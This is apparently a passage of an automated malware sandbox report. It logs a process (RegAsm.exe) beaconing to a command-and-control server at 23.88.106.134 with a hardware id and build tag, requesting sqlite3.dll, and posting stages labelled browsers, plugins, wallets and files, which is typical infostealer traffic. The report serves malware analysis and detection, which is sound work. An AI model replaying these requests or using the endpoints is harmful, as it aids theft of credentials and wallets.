May 27, 2024 14:53:02.444180012 CEST	80	49704	23.88.106.134	192.168.2.5
May 27, 2024 14:53:02.635462046 CEST	80	49704	23.88.106.134	192.168.2.5
May 27, 2024 14:53:02.635529041 CEST	49704	80	192.168.2.5	23.88.106.134
May 27, 2024 14:53:04.896657944 CEST	49704	80	192.168.2.5	23.88.106.134

HTTP Request Dependency Graph

23.88.106.134

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	23.88.106.134	80	408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 14:53:00.307636976 CEST	416	OUT	POST /c73eed764cc59dcb.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCG Host: 23.88.106.134 Content-Length: 216 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 42 45 35 43 37 30 39 44 33 31 32 32 30 34 30 34 30 39 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 67 6f 79 64 61 31 34 38 38 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 2d 2d 0d 0a Data Ascii: ------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="hwid"5BE5C709D3122040409402------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="build"goyda1488------HDGCFHIDAKECFHIEBFCG--
May 27, 2024 14:53:00.962945938 CEST	460	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Mon, 27 May 2024 12:53:00 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 276 Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>
May 27, 2024 14:53:00.964543104 CEST	672	OUT	POST /c73eed764cc59dcb.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFBGDGIDBAAEBFHJKJDG Host: 23.88.106.134 Content-Length: 472 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c [TRUNCATED] Data Ascii: ------BFBGDGIDBAAEBFHJKJDGContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>------BFBGDGIDBAAEBFHJKJDGContent-Disposition: form-data; name="message"browsers------BFBGDGIDBAAEBFHJKJDG--
May 27, 2024 14:53:01.166105032 CEST	460	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Mon, 27 May 2024 12:53:01 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 276 Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>
May 27, 2024 14:53:01.204222918 CEST	671	OUT	POST /c73eed764cc59dcb.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAECGCGHCGHCAKECBKJK Host: 23.88.106.134 Content-Length: 471 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c [TRUNCATED] Data Ascii: ------DAECGCGHCGHCAKECBKJKContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>------DAECGCGHCGHCAKECBKJKContent-Disposition: form-data; name="message"plugins------DAECGCGHCGHCAKECBKJK--
May 27, 2024 14:53:01.404856920 CEST	460	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Mon, 27 May 2024 12:53:01 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 276 Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>
May 27, 2024 14:53:01.423629999 CEST	201	OUT	POST /c73eed764cc59dcb.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDG Host: 23.88.106.134 Content-Length: 7275 Connection: Keep-Alive Cache-Control: no-cache
May 27, 2024 14:53:01.423629999 CEST	7275	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 Data Ascii: ------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on thi
May 27, 2024 14:53:01.627767086 CEST	460	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Mon, 27 May 2024 12:53:01 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 276 Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>
May 27, 2024 14:53:01.660763025 CEST	92	OUT	GET /84bad7132df89fd7/sqlite3.dll HTTP/1.1 Host: 23.88.106.134 Cache-Control: no-cache
May 27, 2024 14:53:01.863326073 CEST	460	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Mon, 27 May 2024 12:53:01 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 276 Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>
May 27, 2024 14:53:02.042164087 CEST	671	OUT	POST /c73eed764cc59dcb.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDGIECGIEBKJJJJKEGHJ Host: 23.88.106.134 Content-Length: 471 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c [TRUNCATED] Data Ascii: ------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="message"wallets------JDGIECGIEBKJJJJKEGHJ--
May 27, 2024 14:53:02.238768101 CEST	460	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Mon, 27 May 2024 12:53:02 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 276 Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>
May 27, 2024 14:53:02.240724087 CEST	669	OUT	POST /c73eed764cc59dcb.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFHIEBKKFHIEGCAKECGH Host: 23.88.106.134 Content-Length: 469 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c [TRUNCATED] Data Ascii: ------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="message"files------AFHIEBKKFHIEGCAKECGH--
May 27, 2024 14:53:02.437469959 CEST	460	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Mon, 27 May 2024 12:53:02 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 276 Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>
May 27, 2024 14:53:02.439212084 CEST	664	OUT	POST /c73eed764cc59dcb.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJKFBAKFBGDHIEBGDAKF Host: 23.88.106.134 Content-Length: 464 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 41 4b 46 42 47 44 48 49 45 42 47 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c [TRUNCATED] Data Ascii: ------JJKFBAKFBGDHIEBGDAKFContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>------JJKFBAKFBGDHIEBGDAKFContent-Disposition: form-data; name="message"------JJKFBAKFBGDHIEBGDAKF--
May 27, 2024 14:53:02.635462046 CEST	460	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Mon, 27 May 2024 12:53:02 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 276 Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>

Target ID:	0
Start time:	08:52:58
Start date:	27/05/2024
